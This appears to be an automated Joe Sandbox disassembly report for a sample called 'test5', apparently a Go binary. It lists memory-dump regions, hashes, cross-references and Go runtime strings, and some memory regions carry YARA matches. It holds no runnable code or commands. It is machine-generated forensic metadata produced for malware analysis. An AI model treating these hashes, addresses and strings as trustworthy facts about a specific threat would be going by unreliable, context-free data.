                      • String ID: (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type 19531259765625invaliduintptrChanDir Value>TuesdayJanuaryOctoberMUI_StdMUI_Dltwindowswsarecvwsasendlookup avx512fn$ MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:, gp->status= pluginpath= : unknown pc called from runtime: pid=3814697265625level 3 reset$pacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStubtrace: out of memory
                      • API String ID: 0-396137863
                      • Opcode ID: 82c97b395591ffc0c125360dc4df6d7cbc9700df5f7e80e2168de26cf36a560b
                      • Instruction ID: 41b644e70b18d63a4c7e497db29cd1d56e008b25b439436759a3b724ee6f3a45
                      • Opcode Fuzzy Hash: 82c97b395591ffc0c125360dc4df6d7cbc9700df5f7e80e2168de26cf36a560b
                      • Instruction Fuzzy Hash: BB71C872518F9489DA41EF65E44035AB7AAFB8ABC0F049339EA8D27B25CF38C491C754
                      Strings
                      • selectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStubtrace: out of memorywirep: already in go37252902984619140625invalid request codebad font file formatis a named type filekey has been revokedconnection timed outJordan Standard TimeArabic Standard Time, xrefs: 006CA027
                      • gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff 1192092895507812559604644775390625permission deniedwrong medium typeno data availableexec format errorGetCurrentProcessunknown type kindreflect: call of refle, xrefs: 006CA050
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff 1192092895507812559604644775390625permission deniedwrong medium typeno data availableexec format errorGetCurrentProcessunknown type kindreflect: call of refle$selectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStubtrace: out of memorywirep: already in go37252902984619140625invalid request codebad font file formatis a named type filekey has been revokedconnection timed outJordan Standard TimeArabic Standard Time
                      • API String ID: 0-1402775695
                      • Opcode ID: 5c41b97fd3451081fb970b0b079e51690ea70757c126afe837280729c8657d42
                      • Instruction ID: 55edb11cd4bad06916be304f9d4db591605eca5fc4f36e26c6a44618754cac47
                      • Opcode Fuzzy Hash: 5c41b97fd3451081fb970b0b079e51690ea70757c126afe837280729c8657d42
                      • Instruction Fuzzy Hash: 40B26732208B94C2D760CF12E448BAAB7AAF389BD4F55912ADF9D47759CF78C894C740
                      Strings
                      • runtime: malformed profBuf buffer - invalid sizeattempt to trace invalid or unsupported P statusruntime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significant bits after mult64bitPow10syscall: string with, xrefs: 006C74F5
                      • runtime: malformed profBuf buffer - tag and data out of syncreflect: call of reflect.Value.Len on ptr to non-array ValueabiRegArgsType needs GC Prog, update methodValueCallFrameObjsgo package net: GODEBUG setting forcing use of Go's resolverfound bad pointer , xrefs: 006C7525
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: runtime: malformed profBuf buffer - invalid sizeattempt to trace invalid or unsupported P statusruntime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significant bits after mult64bitPow10syscall: string with$runtime: malformed profBuf buffer - tag and data out of syncreflect: call of reflect.Value.Len on ptr to non-array ValueabiRegArgsType needs GC Prog, update methodValueCallFrameObjsgo package net: GODEBUG setting forcing use of Go's resolverfound bad pointer
                      • API String ID: 0-2748690606
                      • Opcode ID: 216537cfc3a67d9df0fb55d18db4eb57855e3bd1cc6c5091a2bbaf3b8456b36c
                      • Instruction ID: 62e714d97dab8942fc1fd14df8cc1c267008ca7f8fbcb10bd31f51b66d490078
                      • Opcode Fuzzy Hash: 216537cfc3a67d9df0fb55d18db4eb57855e3bd1cc6c5091a2bbaf3b8456b36c
                      • Instruction Fuzzy Hash: AED13362709A5882CA54DF27A801B7A6763F789FC8F99982DEE0E57701DF78CD42C704
                      Strings
                      • runtime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime:, xrefs: 006AFEBE
                      • runtime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=17763568394002504646778106689453125888178419700125, xrefs: 006AFF2D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: runtime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=17763568394002504646778106689453125888178419700125$runtime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime:
                      • API String ID: 0-659643491
                      • Opcode ID: 65fce8aaa974bd623740baa40fb6586c6514d9027973c4172fb7c270b1a80bdb
                      • Instruction ID: 56b6124627f606732b83621075b649e0a01c6fdf9a215e1d7d9381791c8fcc28
                      • Opcode Fuzzy Hash: 65fce8aaa974bd623740baa40fb6586c6514d9027973c4172fb7c270b1a80bdb
                      • Instruction Fuzzy Hash: E351C93320978089CB54EBA1E04036BBB62F787B90F484579EB9D437A6DB38CC418F52
                      Strings
                      • `&n, xrefs: 00697575
                      • gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/Greek, xrefs: 00697614
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: `&n$gcing MB, got= ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:1562578125int16int32int64uint8arraysliceMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930Localfilesimap2imap3imapspop3shostssse41sse42ssse3parseutf-8%s*%dtext/Greek
                      • API String ID: 0-1699325636
                      • Opcode ID: 5e5bef18eadd8b810fe0dd311f1ef985780234c4fc23cebe915b18f81cf4d82f
                      • Instruction ID: 111b63f833885fb7a312b3f46581ac83eae9e5caa838620674b21040cdc18890
                      • Opcode Fuzzy Hash: 5e5bef18eadd8b810fe0dd311f1ef985780234c4fc23cebe915b18f81cf4d82f
                      • Instruction Fuzzy Hash: BD519536109B84C2EB50CF65F48539ABBA6F785784F51823ADA8C83B66DF7DC485CB40
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903693694.0000021551BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021551BF0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21551bf0000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _initp_misc_winsig
                      • String ID:
                      • API String ID: 2710132595-0
                      • Opcode ID: f5eeccd02aae99182859cd355c685068cf330a2df8fc0dd784810881261ec21a
                      • Instruction ID: 6ffecf4ebaf84dbf7ab41441f9d7c4594cca9b152b33cdfa5167249d9f018247
                      • Opcode Fuzzy Hash: f5eeccd02aae99182859cd355c685068cf330a2df8fc0dd784810881261ec21a
                      • Instruction Fuzzy Hash: 21A1C631609A098FEF54FF75E89CAAA37F2F3A8301721893A904AD7174DA7CD555CB40
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2903805802.0000021553740000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000021553740000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_21553740000_test5.jbxd
                      Yara matches
                      Similarity
                      • API ID: _initp_misc_winsig
                      • String ID:
                      • API String ID: 2710132595-0
                      • Opcode ID: f5eeccd02aae99182859cd355c685068cf330a2df8fc0dd784810881261ec21a
                      • Instruction ID: ce5a33d566a6260ba08a42028ddd7625af9f251b8e2ac35d8b359f4df311a19c
                      • Opcode Fuzzy Hash: f5eeccd02aae99182859cd355c685068cf330a2df8fc0dd784810881261ec21a
                      • Instruction Fuzzy Hash: 57A1C431619A098FEF54FF65E89CAAA37B2F3A8301721893A904AD7270DA7CD555CB40
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: "
                      • API String ID: 0-123907689
                      • Opcode ID: ee6a38f8df12718a8599351b2621cf41095c424588bfb826aceb60c3ffb1e683
                      • Instruction ID: cd72e2a2a221e869c8f8d4140fa541eb508aac779fad2cfad170546e8bffd5eb
                      • Opcode Fuzzy Hash: ee6a38f8df12718a8599351b2621cf41095c424588bfb826aceb60c3ffb1e683
                      • Instruction Fuzzy Hash: 9732F572609BC085DB61CF62E4843DEB762F78ABA4F45822ADB9C477A9CF39C445C740
                      Strings
                      • !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC, xrefs: 006EA5ED, 006EA6F6, 006EA837, 006EA95F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
                      • API String ID: 0-2911004680
                      • Opcode ID: d3b93a2fece257cfb965cb6efa140d660bd7ffff010f2b654b9c322d66e3703c
                      • Instruction ID: 2af278b3f2d3a2e36d9745efa47ede3fedbfe54fabfb513e0d1293a566163d9e
                      • Opcode Fuzzy Hash: d3b93a2fece257cfb965cb6efa140d660bd7ffff010f2b654b9c322d66e3703c
                      • Instruction Fuzzy Hash: F9F10431716BC482DA40DFA6E8043BAA763F784BD0F998026EE5E47786DB7CE845C705
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: `a}
                      • API String ID: 0-3854845269
                      • Opcode ID: c22000196ecc562c940a6878a321f0ec7f5ca8767160c4050052a4a3dc8161e1
                      • Instruction ID: 4d5e2aa32fa0129f188da237dc5a6b343634c007b946a65ebae2badfd6a9e4ad
                      • Opcode Fuzzy Hash: c22000196ecc562c940a6878a321f0ec7f5ca8767160c4050052a4a3dc8161e1
                      • Instruction Fuzzy Hash: 1ED1907220ABC488DB64CB16E4403AAB7A3F386B80F59907ADECD53B59CF78C485C701
                      Strings
                      • runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listruntime.Pinner: argument is nilcasgstatus: , xrefs: 006AC825
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listruntime.Pinner: argument is nilcasgstatus:
                      • API String ID: 0-1312986596
                      • Opcode ID: 80431ab345ef39910831ebdacc3065afccad0df834996bb22e9f2a33af1c0718
                      • Instruction ID: 77b598b92fc7b4b8e39fb7fba627ced54c65c3b600270463a2cf2c712c1a7b9b
                      • Opcode Fuzzy Hash: 80431ab345ef39910831ebdacc3065afccad0df834996bb22e9f2a33af1c0718
                      • Instruction Fuzzy Hash: 58A17E76709B84C1CA10DB16F4406AAA766F38ABD0F546126EF8D57B29CF38D891CF40
                      Strings
                      • bulkBarrierPreWrite: unaligned argumentsruntime: typeBitsBulkBarrier with type refill of span with free space remaining/cpu/classes/scavenge/assist:cpu-secondsruntime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unkn, xrefs: 00691167
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: bulkBarrierPreWrite: unaligned argumentsruntime: typeBitsBulkBarrier with type refill of span with free space remaining/cpu/classes/scavenge/assist:cpu-secondsruntime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unkn
                      • API String ID: 0-2740983204
                      • Opcode ID: 70926af905f72602565be470ee17ca597441bb5a2fb381ab9a670306bf625a08
                      • Instruction ID: 9fd54556344c04295f760f2bfbd16d31b2a955e28af18609e1cf5641bf7b10ff
                      • Opcode Fuzzy Hash: 70926af905f72602565be470ee17ca597441bb5a2fb381ab9a670306bf625a08
                      • Instruction Fuzzy Hash: 5E9190B6715A9486EF508B16E44039AB76AF34AFC0F648126EF8D57F18DF39C4968700
                      Strings
                      • crypto/aes: invalid key size executing on Go runtime stacknotesleep - waitm out of sync/cpu/classes/idle:cpu-seconds/cpu/classes/user:cpu-seconds/gc/heap/allocs-by-size:bytes/gc/stack/starting-size:bytesgc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode=, xrefs: 00702945
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901814768.0000000000927000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901839568.0000000000947000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901861528.0000000000955000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000957000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901877599.000000000099F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901940005.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902089316.0000000000AE5000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2902139384.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_680000_test5.jbxd
                      Similarity
                      • API ID:
                      • String ID: crypto/aes: invalid key size executing on Go runtime stacknotesleep - waitm out of sync/cpu/classes/idle:cpu-seconds/cpu/classes/user:cpu-seconds/gc/heap/allocs-by-size:bytes/gc/stack/starting-size:bytesgc done but gcphase != _GCoffruntime: p.gcMarkWorkerMode=
                      • API String ID: 0-4043407021
                      • Opcode ID: 8d7e609d9cc74623b38c50f456534e705eb4ad7b96f468bc0af77b09696b916a
                      • Instruction ID: d89e6dedf82dc69f44f10a8c8f26580c5cbe0e171d546692c2da211e211e4293
                      • Opcode Fuzzy Hash: 8d7e609d9cc74623b38c50f456534e705eb4ad7b96f468bc0af77b09696b916a
                      • Instruction Fuzzy Hash: 818156667106A5D6EA009F28980837EABA2F351B89FD9D614EF5B077C3DB3CD812D310
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2901532138.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                      • Associated: 00000000.00000002.2901511629.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901665802.00000000007B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2901797089.0000000000924000.00000004.00000001.01000000.00000003.sdmpDownload File
